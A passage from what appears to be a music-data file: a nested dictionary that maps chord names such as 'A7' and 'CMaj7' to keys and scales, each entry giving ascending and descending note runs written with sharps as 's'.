'AsMajor': [ [ ['C', 'D', 'Ds'], ['Ds', 'F', 'G'], ['G', 'A', 'As', 'C'] ], [ ['C', 'As', 'A', 'G'], ['Ds', 'D', 'C'], ['G', 'F', 'Ds'] ] ],
'FMinor': [ [ ['C', 'Cs', 'Ds'], ['Ds', 'F', 'G'], ['G', 'Gs', 'As', 'C'] ], [ ['C', 'As', 'Gs', 'G'], ['Ds', 'Cs', 'C'], ['G', 'F', 'Ds'] ] ],
'CHMinor': [ [ ['C', 'D', 'Ds'], ['Ds', 'F', 'G'], ['G', 'Gs', 'B', 'C'] ], [ ['C', 'B', 'Gs', 'G'], ['Ds', 'D', 'C'], ['G', 'F', 'Ds'] ] ],
'GMinor': [ [ ['C', 'D', 'Ds'], ['Ds', 'F', 'G'], ['G', 'A', 'As', 'C'] ], [ ['C', 'As', 'A', 'G'], ['Ds', 'D', 'C'], ['G', 'F', 'Ds'] ] ],
},
'EDim': {
'DMinor': [ [ ['E', 'F', 'G'], ['G', 'A', 'As'], ['As', 'C', 'D', 'E'] ], [ ['E', 'D', 'C', 'As'], ['G', 'F', 'E'], ['As', 'A', 'G'] ] ],
'FMajor': [ [ ['E', 'F', 'G'], ['G', 'A', 'As'], ['As', 'C', 'D', 'E'] ], [ ['E', 'D', 'C', 'As'], ['G', 'F', 'E'], ['As', 'A', 'G'] ] ],
},
'CsMajor': {
'GsMajor': [ [ ['Cs', 'Ds', 'F'], ['F', 'G', 'Gs'], ['Gs', 'As', 'C', 'Cs'] ], [ ['Cs', 'C', 'As', 'Gs'], ['F', 'Ds', 'Cs'], ['Gs', 'G', 'F'] ] ],
'CsMajor': [ [ ['Cs', 'Ds', 'F'], ['F', 'Fs', 'Gs'], ['Gs', 'As', 'C', 'Cs'] ], [ ['Cs', 'C', 'As', 'Gs'], ['F', 'Ds', 'Cs'], ['Gs', 'Fs', 'F'] ] ],
'AsMinor': [ [ ['Cs', 'Ds', 'F'], ['F', 'Fs', 'Gs'], ['Gs', 'As', 'C', 'Cs'] ], [ ['Cs', 'C', 'As', 'Gs'], ['F', 'Ds', 'Cs'], ['Gs', 'Fs', 'F'] ] ],
'DsMinor': [ [ ['Cs', 'Ds', 'F'], ['F', 'Fs', 'Gs'], ['Gs', 'As', 'B', 'Cs'] ], [ ['Cs', 'B', 'As', 'Gs'], ['F', 'Ds', 'Cs'], ['Gs', 'Fs', 'F'] ] ],
'FMinor': [ [ ['Cs', 'Ds', 'F'], ['F', 'G', 'Gs'], ['Gs', 'As', 'C', 'Cs'] ], [ ['Cs', 'C', 'As', 'Gs'], ['F', 'Ds', 'Cs'], ['Gs', 'G', 'F'] ] ],
'FsMajor': [ [ ['Cs', 'Ds', 'F'], ['F', 'Fs', 'Gs'], ['Gs', 'As', 'B', 'Cs'] ], [ ['Cs', 'B', 'As', 'Gs'], ['F', 'Ds', 'Cs'], ['Gs', 'Fs', 'F'] ] ],
},
'A7': {
'BMinor': [ [ ['A', 'B', 'Cs'], ['Cs', 'D', 'E'], ['E', 'Fs', 'G', 'A'] ], [ ['A', 'G', 'Fs', 'E'], ['Cs', 'B', 'A'], ['E', 'D', 'Cs'] ] ],
'CsMinor': [ [ ['A', 'B', 'Cs'], ['Cs', 'Ds', 'E'], ['E', 'Fs', 'Gs', 'A'] ], [ ['A', 'Gs', 'Fs', 'E'], ['Cs', 'B', 'A'], ['E', 'Ds', 'Cs'] ] ],
'FsMinor': [ [ ['A', 'B', 'Cs'], ['Cs', 'D', 'E'], ['E', 'Fs', 'Gs', 'A'] ], [ ['A', 'Gs', 'Fs', 'E'], ['Cs', 'B', 'A'], ['E', 'D', 'Cs'] ] ],
'AMajor': [ [ ['A', 'B', 'Cs'], ['Cs', 'D', 'E'], ['E', 'Fs', 'Gs', 'A'] ], [ ['A', 'Gs', 'Fs', 'E'], ['Cs', 'B', 'A'], ['E', 'D', 'Cs'] ] ],
'EMajor': [ [ ['A', 'B', 'Cs'], ['Cs', 'Ds', 'E'], ['E', 'Fs', 'Gs', 'A'] ], [ ['A', 'Gs', 'Fs', 'E'], ['Cs', 'B', 'A'], ['E', 'Ds', 'Cs'] ] ],
'DMajor': [ [ ['A', 'B', 'Cs'], ['Cs', 'D', 'E'], ['E', 'Fs', 'G', 'A'] ], [ ['A', 'G', 'Fs', 'E'], ['Cs', 'B', 'A'], ['E', 'D', 'Cs'] ] ],
},
'Fm7': {
'GsMajor': [ [ ['F', 'G', 'Gs'], ['Gs', 'As', 'C'], ['C', 'Cs', 'Ds', 'F'] ], [ ['F', 'Ds', 'Cs', 'C'], ['Gs', 'G', 'F'], ['C', 'As', 'Gs'] ] ],
'CMinor': [ [ ['F', 'G', 'Gs'], ['Gs', 'As', 'C'], ['C', 'D', 'Ds', 'F'] ], [ ['F', 'Ds', 'D', 'C'], ['Gs', 'G', 'F'], ['C', 'As', 'Gs'] ] ],
'CsMajor': [ [ ['F', 'Fs', 'Gs'], ['Gs', 'As', 'C'], ['C', 'Cs', 'Ds', 'F'] ], [ ['F', 'Ds', 'Cs', 'C'], ['Gs', 'Fs', 'F'], ['C', 'As', 'Gs'] ] ],
'DsMajor': [ [ ['F', 'G', 'Gs'], ['Gs', 'As', 'C'], ['C', 'D', 'Ds', 'F'] ], [ ['F', 'Ds', 'D', 'C'], ['Gs', 'G', 'F'], ['C', 'As', 'Gs'] ] ],
'AsMinor': [ [ ['F', 'Fs', 'Gs'], ['Gs', 'As', 'C'], ['C', 'Cs', 'Ds', 'F'] ], [ ['F', 'Ds', 'Cs', 'C'], ['Gs', 'Fs', 'F'], ['C', 'As', 'Gs'] ] ],
'FMinor': [ [ ['F', 'G', 'Gs'], ['Gs', 'As', 'C'], ['C', 'Cs', 'Ds', 'F'] ], [ ['F', 'Ds', 'Cs', 'C'], ['Gs', 'G', 'F'], ['C', 'As', 'Gs'] ] ],
'CHMinor': [ [ ['F', 'G', 'Gs'], ['Gs', 'B', 'C'], ['C', 'D', 'Ds', 'F'] ], [ ['F', 'Ds', 'D', 'C'], ['Gs', 'G', 'F'], ['C', 'B', 'Gs'] ] ],
},
'DsMajor': {
'GsMajor': [ [ ['Ds', 'F', 'G'], ['G', 'Gs', 'As'], ['As', 'C', 'Cs', 'Ds'] ], [ ['Ds', 'Cs', 'C', 'As'], ['G', 'F', 'Ds'], ['As', 'Gs', 'G'] ] ],
'CMinor': [ [ ['Ds', 'F', 'G'], ['G', 'Gs', 'As'], ['As', 'C', 'D', 'Ds'] ], [ ['Ds', 'D', 'C', 'As'], ['G', 'F', 'Ds'], ['As', 'Gs', 'G'] ] ],
'DsMajor': [ [ ['Ds', 'F', 'G'], ['G', 'Gs', 'As'], ['As', 'C', 'D', 'Ds'] ], [ ['Ds', 'D', 'C', 'As'], ['G', 'F', 'Ds'], ['As', 'Gs', 'G'] ] ],
'AsMajor': [ [ ['Ds', 'F', 'G'], ['G', 'A', 'As'], ['As', 'C', 'D', 'Ds'] ], [ ['Ds', 'D', 'C', 'As'], ['G', 'F', 'Ds'], ['As', 'A', 'G'] ] ],
'FMinor': [ [ ['Ds', 'F', 'G'], ['G', 'Gs', 'As'], ['As', 'C', 'Cs', 'Ds'] ], [ ['Ds', 'Cs', 'C', 'As'], ['G', 'F', 'Ds'], ['As', 'Gs', 'G'] ] ],
'GMinor': [ [ ['Ds', 'F', 'G'], ['G', 'A', 'As'], ['As', 'C', 'D', 'Ds'] ], [ ['Ds', 'D', 'C', 'As'], ['G', 'F', 'Ds'], ['As', 'A', 'G'] ] ],
},
'E7': {
'CsMinor': [ [ ['E', 'Fs', 'Gs'], ['Gs', 'A', 'B'], ['B', 'Cs', 'Ds', 'E'] ], [ ['E', 'Ds', 'Cs', 'B'], ['Gs', 'Fs', 'E'], ['B', 'A', 'Gs'] ] ],
'FsMinor': [ [ ['E', 'Fs', 'Gs'], ['Gs', 'A', 'B'], ['B', 'Cs', 'D', 'E'] ], [ ['E', 'D', 'Cs', 'B'], ['Gs', 'Fs', 'E'], ['B', 'A', 'Gs'] ] ],
'GsMinor': [ [ ['E', 'Fs', 'Gs'], ['Gs', 'As', 'B'], ['B', 'Cs', 'Ds', 'E'] ], [ ['E', 'Ds', 'Cs', 'B'], ['Gs', 'Fs', 'E'], ['B', 'As', 'Gs'] ] ],
'BMajor': [ [ ['E', 'Fs', 'Gs'], ['Gs', 'As', 'B'], ['B', 'Cs', 'Ds', 'E'] ], [ ['E', 'Ds', 'Cs', 'B'], ['Gs', 'Fs', 'E'], ['B', 'As', 'Gs'] ] ],
'AMajor': [ [ ['E', 'Fs', 'Gs'], ['Gs', 'A', 'B'], ['B', 'Cs', 'D', 'E'] ], [ ['E', 'D', 'Cs', 'B'], ['Gs', 'Fs', 'E'], ['B', 'A', 'Gs'] ] ],
'EMajor': [ [ ['E', 'Fs', 'Gs'], ['Gs', 'A', 'B'], ['B', 'Cs', 'Ds', 'E'] ], [ ['E', 'Ds', 'Cs', 'B'], ['Gs', 'Fs', 'E'], ['B', 'A', 'Gs'] ] ],
},
'C7': {
'CMajor': [ [ ['C', 'D', 'E'], ['E', 'F', 'G'], ['G', 'A', 'B', 'C'] ], [ ['C', 'B', 'A', 'G'], ['E', 'D', 'C'], ['G', 'F', 'E'] ] ],
'GMajor': [ [ ['C', 'D', 'E'], ['E', 'Fs', 'G'], ['G', 'A', 'B', 'C'] ], [ ['C', 'B', 'A', 'G'], ['E', 'D', 'C'], ['G', 'Fs', 'E'] ] ],
'EMinor': [ [ ['C', 'D', 'E'], ['E', 'Fs', 'G'], ['G', 'A', 'B', 'C'] ], [ ['C', 'B', 'A', 'G'], ['E', 'D', 'C'], ['G', 'Fs', 'E'] ] ],
'DMinor': [ [ ['C', 'D', 'E'], ['E', 'F', 'G'], ['G', 'A', 'As', 'C'] ], [ ['C', 'As', 'A', 'G'], ['E', 'D', 'C'], ['G', 'F', 'E'] ] ],
'FMajor': [ [ ['C', 'D', 'E'], ['E', 'F', 'G'], ['G', 'A', 'As', 'C'] ], [ ['C', 'As', 'A', 'G'], ['E', 'D', 'C'], ['G', 'F', 'E'] ] ],
'AMinor': [ [ ['C', 'D', 'E'], ['E', 'F', 'G'], ['G', 'A', 'B', 'C'] ], [ ['C', 'B', 'A', 'G'], ['E', 'D', 'C'], ['G', 'F', 'E'] ] ],
},
'GsMinor': {
'CsMinor': [ [ ['Gs', 'A', 'B'], ['B', 'Cs', 'Ds'], ['Ds', 'E', 'Fs', 'Gs'] ], [ ['Gs', 'Fs', 'E', 'Ds'], ['B', 'A', 'Gs'], ['Ds', 'Cs', 'B'] ] ],
'GsMinor': [ [ ['Gs', 'As', 'B'], ['B', 'Cs', 'Ds'], ['Ds', 'E', 'Fs', 'Gs'] ], [ ['Gs', 'Fs', 'E', 'Ds'], ['B', 'As', 'Gs'], ['Ds', 'Cs', 'B'] ] ],
'BMajor': [ [ ['Gs', 'As', 'B'], ['B', 'Cs', 'Ds'], ['Ds', 'E', 'Fs', 'Gs'] ], [ ['Gs', 'Fs', 'E', 'Ds'], ['B', 'As', 'Gs'], ['Ds', 'Cs', 'B'] ] ],
'DsMinor': [ [ ['Gs', 'As', 'B'], ['B', 'Cs', 'Ds'], ['Ds', 'F', 'Fs', 'Gs'] ], [ ['Gs', 'Fs', 'F', 'Ds'], ['B', 'As', 'Gs'], ['Ds', 'Cs', 'B'] ] ],
'EMajor': [ [ ['Gs', 'A', 'B'], ['B', 'Cs', 'Ds'], ['Ds', 'E', 'Fs', 'Gs'] ], [ ['Gs', 'Fs', 'E', 'Ds'], ['B', 'A', 'Gs'], ['Ds', 'Cs', 'B'] ] ],
'CHMinor': [ [ ['Gs', 'B', 'C'], ['B', 'C', 'D'], ['Ds', 'F', 'G', 'Gs'] ], [ ['Gs', 'G', 'F', 'Ds'], ['B', 'Gs', 'G'], ['Ds', 'D', 'C'] ] ],
'FsMajor': [ [ ['Gs', 'As', 'B'], ['B', 'Cs', 'Ds'], ['Ds', 'F', 'Fs', 'Gs'] ], [ ['Gs', 'Fs', 'F', 'Ds'], ['B', 'As', 'Gs'], ['Ds', 'Cs', 'B'] ] ],
},
'CMaj7': {
'CMajor': [ [ ['C', 'D', 'E'], ['E', 'F', 'G'], ['G', 'A', 'B', 'C'] ], [ ['C', 'B', 'A', 'G'], ['E', 'D', 'C'], ['G', 'F', 'E'] ] ],
'GMajor': [ [ ['C', 'D', 'E'], ['E', 'Fs', 'G'], ['G', 'A', 'B', 'C'] ], [ ['C', 'B', 'A', 'G'], ['E', 'D', 'C'], ['G', 'Fs', 'E'] ] ],
'EMinor': [ [ ['C', 'D', 'E'], ['E', 'Fs', 'G'], ['G', 'A', 'B', 'C'] ], [ ['C', 'B', 'A', 'G'], ['E', 'D', 'C'], ['G', 'Fs', 'E'] ] ],
'DMinor': [ [ ['C', 'D', 'E'], ['E', 'F', 'G'], ['G', 'A', 'As', 'C'] ], [ ['C', 'As', 'A', 'G'], ['E', 'D', 'C'], ['G', 'F', 'E'] ] ],
'FMajor': [ [ ['C', 'D', 'E'], ['E', 'F', 'G'], ['G', 'A', 'As', 'C'] ], [ ['C', 'As', 'A', 'G'], ['E', 'D', 'C'], ['G', 'F', 'E'] ] ],
'AMinor': [ [ ['C', 'D', 'E'], ['E', 'F', 'G'], ['G', 'A', 'B', 'C'] ], [ ['C', 'B', 'A', 'G'], ['E', 'D', 'C'], ['G', 'F', 'E'] ] ],
},
'GMaj7': {
'CMajor': [ [ ['G', 'A', 'B'], ['B', 'C', 'D'], ['D', 'E', 'F', 'G'] ], [ ['G', 'F', 'E', 'D'], ['B', 'A', 'G'], ['D', 'C', 'B'] ] ],
'BMinor': [ [ ['G', 'A', 'B'], ['B', 'Cs', 'D'], ['D', 'E', 'Fs', 'G'] ], [ ['G', 'Fs', 'E', 'D'], ['B', 'A', 'G'], ['D', 'Cs', 'B'] ] ],
'GMajor': [ [ ['G', 'A', 'B'], ['B', 'C', 'D'], ['D', 'E', 'Fs', 'G'] ], [ ['G', 'Fs', 'E', 'D'], ['B', 'A', 'G'], ['D', 'C', 'B'] ] ],
'EMinor': [ [ ['G', 'A', 'B'], ['B', 'C', 'D'], ['D', 'E', 'Fs', 'G'] ], [ ['G', 'Fs', 'E', 'D'], ['B', 'A', 'G'], ['D', 'C', 'B'] ] ],
'CHMinor': [ [ ['G', 'Gs', 'B'], ['B', 'C', 'D'], ['D', 'Ds', 'F', 'G'] ], [ ['G', 'F', 'Ds', 'D'], ['B', 'Gs', 'G'], ['D', 'C', 'B'] ] ],
'AMinor': [ [ ['G', 'A', 'B'], ['B', 'C', 'D'], ['D', 'E', 'F', 'G'] ], [ ['G', 'F', 'E', 'D'], ['B', 'A', 'G'], ['D', 'C', 'B'] ] ],
'DMajor': [ [ ['G', 'A', 'B'], ['B', 'Cs', 'D'], ['D', 'E', 'Fs', 'G'] ], [ ['G', 'Fs', 'E', 'D'], ['B', 'A', 'G'], ['D', 'Cs', 'B'] ] ],
},
'GsMaj7': {
'GsMajor': [ [ ['Gs', 'As', 'C'], ['C', 'Cs', 'Ds'], ['Ds', 'F', 'G', 'Gs'] ], [ ['Gs', 'G', 'F', 'Ds'], ['C', 'As', 'Gs'], ['Ds', 'Cs', 'C'] ] ],
'CMinor': [ [ ['Gs', 'As', 'C'], ['C', 'D', 'Ds'], ['Ds', 'F', 'G', 'Gs'] ], [ ['Gs', 'G', 'F', 'Ds'], ['C', 'As', 'Gs'], ['Ds', 'D', 'C'] ] ],
'CsMajor': [ [ ['Gs', 'As', 'C'], ['C', 'Cs', 'Ds'], ['Ds', 'F', 'Fs', 'Gs'] ], [ ['Gs', 'Fs', 'F', 'Ds'], ['C', 'As', 'Gs'], ['Ds', 'Cs', 'C'] ] ],
'DsMajor': [ [ ['Gs', 'As', 'C'], ['C', 'D', 'Ds'], ['Ds', 'F', 'G', 'Gs'] ], [ ['Gs', 'G', 'F', 'Ds'], ['C', 'As', 'Gs'], ['Ds', 'D', 'C'] ] ],
'AsMinor': [ [ ['Gs', 'As', 'C'], ['C', 'Cs', 'Ds'], ['Ds', 'F', 'Fs', 'Gs'] ], [ ['Gs', 'Fs', 'F', 'Ds'], ['C', 'As', 'Gs'], ['Ds', 'Cs', 'C'] ] ],
'FMinor': [ [ ['Gs', 'As', 'C'], ['C', 'Cs', 'Ds'], ['Ds', 'F', 'G', 'Gs'] ], [ ['Gs', 'G', 'F', 'Ds'], ['C', 'As', 'Gs'], ['Ds', 'Cs', 'C'] ] ],
'CHMinor': [ [ ['Gs', 'B', 'C'], ['C', 'D', 'Ds'], ['Ds', 'F', 'G', 'Gs'] ], [ ['Gs', 'G', 'F', 'Ds'], ['C', 'B', 'Gs'], ['Ds', 'D', 'C'] ] ],
},
'Asm7': {
'GsMajor': [ [ ['As', 'C', 'Cs'], ['Cs', 'Ds', 'F'], ['F', 'G', 'Gs', 'As'] ], [ ['As', 'Gs', 'G', 'F'], ['Cs', 'C', 'As'], ['F', 'Ds', 'Cs'] ] ],
'CsMajor': [ [ ['As', 'C', 'Cs'], ['Cs', 'Ds', 'F'], ['F', 'Fs', 'Gs', 'As'] ], [ ['As', 'Gs', 'Fs', 'F'], ['Cs', 'C', 'As'], ['F', 'Ds', 'Cs'] ] ],
'AsMinor': [ [ ['As', 'C', 'Cs'], ['Cs', 'Ds', 'F'], ['F', 'Fs', 'Gs', 'As'] ], [ ['As', 'Gs', 'Fs', 'F'], ['Cs', 'C', 'As'], ['F', 'Ds', 'Cs'] ] ],
'DsMinor': [ [ ['As', 'B', 'Cs'], ['Cs', 'Ds', 'F'], ['F', 'Fs', 'Gs', 'As'] ], [ ['As', 'Gs', 'Fs', 'F'], ['Cs', 'B', 'As'], ['F', 'Ds', 'Cs'] ] ],
'FMinor': [ [ ['As', 'C', 'Cs'], ['Cs', 'Ds', 'F'], ['F', 'G', 'Gs', 'As'] ], [ ['As', 'Gs', 'G', 'F'], ['Cs', 'C', 'As'], ['F', 'Ds', 'Cs'] ] ],
'FsMajor': [ [ ['As', 'B', 'Cs'], ['Cs', 'Ds', 'F'], ['F', 'Fs', 'Gs', 'As'] ], [ ['As', 'Gs', 'Fs', 'F'], ['Cs', 'B', 'As'], ['F', 'Ds', 'Cs'] ] ],
},
'Csm7': {
'CsMinor': [ [ ['Cs', 'Ds', 'E'], ['E', 'Fs', 'Gs'], ['Gs', 'A', 'B', 'Cs'] ], [ ['Cs', 'B', 'A', 'Gs'], ['E', 'Ds', 'Cs'], ['Gs', 'Fs', 'E'] ] ],
'FsMinor': [ [ ['Cs', 'D', 'E'], ['E', 'Fs', 'Gs'], ['Gs', 'A', 'B', 'Cs'] ], [ ['Cs', 'B', 'A', 'Gs'], ['E', 'D', 'Cs'], ['Gs', 'Fs', 'E'] ] ],
'GsMinor': [ [ ['Cs', 'Ds', 'E'], ['E', 'Fs', 'Gs'], ['Gs', 'As', 'B', 'Cs'] ], [ ['Cs', 'B', 'As', 'Gs'], ['E', 'Ds', 'Cs'], ['Gs', 'Fs', 'E'] ] ],
'BMajor': [ [ ['Cs', 'Ds', 'E'], ['E', 'Fs', 'Gs'], ['Gs', 'As', 'B', 'Cs'] ], [ ['Cs', 'B', 'As', 'Gs'], ['E', 'Ds', 'Cs'], ['Gs', 'Fs', 'E'] ] ],
'AMajor': [ [ ['Cs', 'D', 'E'], ['E', 'Fs', 'Gs'], ['Gs', 'A', 'B', 'Cs'] ], [ ['Cs', 'B', 'A', 'Gs'], ['E', 'D', 'Cs'], ['Gs', 'Fs', 'E'] ] ],
'EMajor': [ [ ['Cs', 'Ds', 'E'], ['E', 'Fs', 'Gs'], ['Gs', 'A', 'B', 'Cs'] ], [ ['Cs', 'B', 'A', 'Gs'], ['E', 'Ds', 'Cs'], ['Gs', 'Fs', 'E'] ] ],
},
'G7': {
'CMajor': [ [ ['G', 'A', 'B'], ['B', 'C', 'D'], ['D', 'E', 'F', 'G'] ], [ ['G', 'F', 'E', 'D'], ['B', 'A', 'G'], ['D', 'C', 'B'] ] ],
'BMinor': [ [ ['G', 'A', 'B'], ['B', 'Cs', 'D'], ['D', 'E', 'Fs', 'G'] ], [ ['G', 'Fs', 'E', 'D'], ['B', 'A', 'G'], ['D', 'Cs', 'B'] ] ],
'GMajor': [ [ ['G', 'A', 'B'], ['B', 'C', 'D'], ['D', 'E', 'Fs', 'G'] ], [ ['G', 'Fs', 'E', 'D'], ['B', 'A', 'G'], ['D', 'C', 'B'] ] ],
'EMinor': [ [ ['G', 'A', 'B'], ['B', 'C', 'D'], ['D', 'E', 'Fs', 'G'] ], [ ['G', 'Fs', 'E', 'D'], ['B', 'A', 'G'], ['D', 'C', 'B'] ] ],
'CHMinor': [ [ ['G', 'Gs', 'B'], ['B', 'C', 'D'], ['D', 'Ds', 'F', 'G'] ], [ ['G', 'F', 'Ds', 'D'], ['B', 'Gs', 'G'], ['D', 'C', 'B'] ] ],
'AMinor': [ [ ['G', 'A', 'B'], ['B', 'C', 'D'], ['D', 'E', 'F', 'G'] ], [ ['G', 'F', 'E', 'D'], ['B', 'A', 'G'], ['D', 'C', 'B'] ] ],
'DMajor': [ [ ['G', 'A', 'B'], ['B', 'Cs', 'D'], ['D', 'E', 'Fs', 'G'] ], [ ['G', 'Fs', 'E', 'D'], ['B', 'A', 'G'], ['D', 'Cs', 'B'] ] ],
},
'BMaj7': {
'CsMinor': [ [ ['B', 'Cs', 'Ds'], ['Ds', 'E', 'Fs'], ['Fs', 'Gs', 'A', 'B'] ], [ ['B', 'A', 'Gs', 'Fs'], ['Ds', 'Cs', 'B'], ['Fs', 'E', 'Ds'] ] ],
'GsMinor': [ [ ['B', 'Cs', 'Ds'], ['Ds', 'E', 'Fs'], ['Fs', 'Gs', 'As', 'B'] ], [ ['B', 'As', 'Gs', 'Fs'], ['Ds', 'Cs', 'B'], ['Fs', 'E', 'Ds'] ] ],
'BMajor': [ [ ['B', 'Cs', 'Ds'], ['Ds', 'E', 'Fs'], ['Fs', 'Gs', 'As', 'B'] ], [ ['B', 'As', 'Gs', 'Fs'], ['Ds', 'Cs', 'B'], ['Fs', 'E', 'Ds'] ] ],
'DsMinor': [ [ ['B', 'Cs', 'Ds'], ['Ds', 'F', 'Fs'], ['Fs', 'Gs', 'As', 'B'] ], [ ['B', 'As', 'Gs', 'Fs'], ['Ds', 'Cs', 'B'], ['Fs', 'F', 'Ds'] ] ],
'EMajor': [ [ ['B', 'Cs', 'Ds'], ['Ds', 'E', 'Fs'], ['Fs', 'Gs', 'A', 'B'] ], [ ['B', 'A', 'Gs', 'Fs'], ['Ds', 'Cs', 'B'], ['Fs', 'E', 'Ds'] ] ],
'FsMajor': [ [ ['B', 'Cs', 'Ds'], ['Ds', 'F', 'Fs'], ['Fs', 'Gs', 'As', 'B'] ], [ ['B', 'As', 'Gs', 'Fs'], ['Ds', 'Cs', 'B'], ['Fs', 'F', 'Ds'] ] ],
},
'Ds7': {
'GsMajor': [ [ ['Ds', 'F', 'G'], ['G', 'Gs', 'As'], ['As', 'C', 'Cs', 'Ds'] ], [ ['Ds', 'Cs', 'C', 'As'], ['G', 'F', 'Ds'], ['As', 'Gs', 'G'] ] ],
'CMinor': [ [ ['Ds', 'F', 'G'], ['G', 'Gs', 'As'], ['As', 'C', 'D', 'Ds'] ], [ ['Ds', 'D', 'C', 'As'], ['G', 'F', 'Ds'], ['As', 'Gs', 'G'] ] ],
'DsMajor': [ [ ['Ds', 'F', 'G'], ['G', 'Gs', 'As'], ['As', 'C', 'D', 'Ds'] ], [ ['Ds', 'D', 'C', 'As'], ['G', 'F', 'Ds'], ['As', 'Gs', 'G'] ] ],
'AsMajor': [ [ ['Ds', 'F', 'G'], ['G', 'A', 'As'], ['As', 'C', 'D', 'Ds'] ], [ ['Ds', 'D', 'C', 'As'], ['G', 'F', 'Ds'], ['As', 'A', 'G'] ] ],
'FMinor': [ [ ['Ds', 'F', 'G'], ['G', 'Gs', 'As'], ['As', 'C', 'Cs', 'Ds'] ], [ ['Ds', 'Cs', 'C', 'As'], ['G', 'F', 'Ds'], ['As', 'Gs', 'G'] ] ],
'GMinor': [ [ ['Ds', 'F', 'G'], ['G', 'A', 'As'], ['As', 'C', 'D', 'Ds'] ], [ ['Ds', 'D', 'C', 'As'], ['G', 'F', 'Ds'], ['As', 'A', 'G'] ] ],
},
'AsMinor': {
'GsMajor': [ [ ['As', 'C', 'Cs'], ['Cs', 'Ds', 'F'], ['F', 'G', 'Gs', 'As'] ], [ ['As', 'Gs', 'G', 'F'], ['Cs', 'C', 'As'], ['F', 'Ds', 'Cs'] ] ],
'CsMajor': [ [ ['As', 'C', 'Cs'], ['Cs', 'Ds', 'F'], ['F', 'Fs', 'Gs', 'As'] ], [ ['As', 'Gs', 'Fs', 'F'], ['Cs', 'C', 'As'], ['F', 'Ds', 'Cs'] ] ],
'AsMinor': [ [ ['As', 'C', 'Cs'], ['Cs', 'Ds', 'F'], ['F', 'Fs', 'Gs', 'As'] ], [ ['As', 'Gs', 'Fs', 'F'], ['Cs', 'C', 'As'], ['F', 'Ds', 'Cs'] ] ],
'DsMinor': [ [ ['As', 'B', 'Cs'], ['Cs', 'Ds', 'F'], ['F', 'Fs', 'Gs', 'As'] ], [ ['As', 'Gs', 'Fs', 'F'], ['Cs', 'B', 'As'], ['F', 'Ds', 'Cs'] ] ],
'FMinor': [ [ ['As', 'C', 'Cs'], ['Cs', 'Ds', 'F'], ['F', 'G', 'Gs', 'As'] ], [ ['As', 'Gs', 'G', 'F'], ['Cs', 'C', 'As'], ['F', 'Ds', 'Cs'] ] ],
'FsMajor': [ [ ['As', 'B', 'Cs'], ['Cs', 'Ds', 'F'], ['F', 'Fs', 'Gs', 'As'] ], [ ['As', 'Gs', 'Fs', 'F'], ['Cs', 'B', 'As'], ['F', 'Ds', 'Cs'] ] ],
},
'AsMajor': {
'DMinor': [ [ ['As', 'C', 'D'], ['D', 'E', 'F'], ['F', 'G', 'A', 'As'] ], [ ['As', 'A', 'G', 'F'], ['D', 'C', 'As'], ['F', 'E', 'D'] ] ],
'FMajor': [ [ ['As', 'C', 'D'], ['D', 'E', 'F'], ['F', 'G', 'A', 'As'] ], [ ['As', 'A', 'G', 'F'], ['D', 'C', 'As'], ['F', 'E', 'D'] ] ],
'CMinor': [ [ ['As', 'C', 'D'], ['D', 'Ds', 'F'], ['F', 'G', 'Gs', 'As'] ], [ ['As', 'Gs', 'G', 'F'], ['D', 'C', 'As'], ['F', 'Ds', 'D'] ] ],
'DsMajor': [ [ ['As', 'C', 'D'], ['D', 'Ds', 'F'], ['F', 'G', 'Gs', 'As'] ], [ ['As', 'Gs', 'G', 'F'], ['D', 'C', 'As'], ['F', 'Ds', 'D'] ] ],
'AsMajor': [ [ ['As', 'C', 'D'], ['D', 'Ds', 'F'], ['F', 'G', 'A', 'As'] ], [ ['As', 'A', 'G', 'F'], ['D', 'C', 'As'], ['F', 'Ds', 'D'] ] ],
'GMinor': [ [ ['As', 'C', 'D'], ['D', 'Ds', 'F'], ['F', 'G', 'A', 'As'] ], [ ['As', 'A', 'G', 'F'], ['D', 'C', 'As'], ['F', 'Ds', 'D'] ] ],
},
'AMaj7': {
'BMinor': [ [ ['A', 'B', 'Cs'], ['Cs', 'D', 'E'], ['E', 'Fs', 'G', 'A'] ], [ ['A', 'G', 'Fs', 'E'], ['Cs', 'B', 'A'], ['E', 'D', 'Cs'] ] ],
'CsMinor': [ [ ['A', 'B', 'Cs'], ['Cs', 'Ds', 'E'], ['E', 'Fs', 'Gs', 'A'] ], [ ['A', 'Gs', 'Fs', 'E'], ['Cs', 'B', 'A'], ['E', 'Ds', 'Cs'] ] ],
'FsMinor': [ [ ['A', 'B', 'Cs'], ['Cs', 'D', 'E'], ['E', 'Fs', 'Gs', 'A'] ], [ ['A', 'Gs', 'Fs', 'E'], ['Cs', 'B', 'A'], ['E', 'D', 'Cs'] ] ],
'AMajor': [ [ ['A', 'B', 'Cs'], ['Cs', 'D', 'E'], ['E', 'Fs', 'Gs', 'A'] ], [ ['A', 'Gs', 'Fs', 'E'], ['Cs', 'B', 'A'], ['E', 'D', 'Cs'] ] ],
'EMajor': [ [ ['A', 'B', 'Cs'], ['Cs', 'Ds', 'E'], ['E', 'Fs', 'Gs', 'A'] ], [ ['A', 'Gs', 'Fs', 'E'], ['Cs', 'B', 'A'], ['E', 'Ds', 'Cs'] ] ],
'DMajor': [ [ ['A', 'B', 'Cs'], ['Cs', 'D', 'E'], ['E', 'Fs', 'G', 'A'] ], [ ['A', 'G', 'Fs', 'E'], ['Cs', 'B', 'A'], ['E', 'D', 'Cs'] ] ],
},
'DMajor': {
'BMinor': [ [ ['D', 'E', 'Fs'], ['Fs', 'G', 'A'], ['A', 'B', 'Cs', 'D'] ], [ ['D', 'Cs', 'B', 'A'], ['Fs', 'E', 'D'], ['A', 'G', 'Fs'] ] ],
'FsMinor': [ [ ['D', 'E', 'Fs'], ['Fs', 'Gs', 'A'], ['A', 'B', 'Cs', 'D'] ], [ ['D', 'Cs', 'B', 'A'], ['Fs', 'E', 'D'], ['A', 'Gs', 'Fs'] ] ],
'GMajor': [ [ ['D', 'E', 'Fs'], ['Fs', 'G', 'A'], ['A', 'B', 'C', 'D'] ], [ ['D', 'C', 'B', 'A'], ['Fs', 'E', 'D'], ['A', 'G', 'Fs'] ] ],
'EMinor': [ [ ['D', 'E', 'Fs'], ['Fs', 'G', 'A'], ['A', 'B', 'C', 'D'] ], [ ['D', 'C', 'B', 'A'], ['Fs', 'E', 'D'], ['A', 'G', 'Fs'] ] ],
'AMajor': [ [ ['D', 'E', 'Fs'], ['Fs', 'Gs', 'A'], ['A', 'B', 'Cs', 'D'] ], [ ['D', 'Cs', 'B', 'A'], ['Fs', 'E', 'D'], ['A', 'Gs', 'Fs'] ] ],
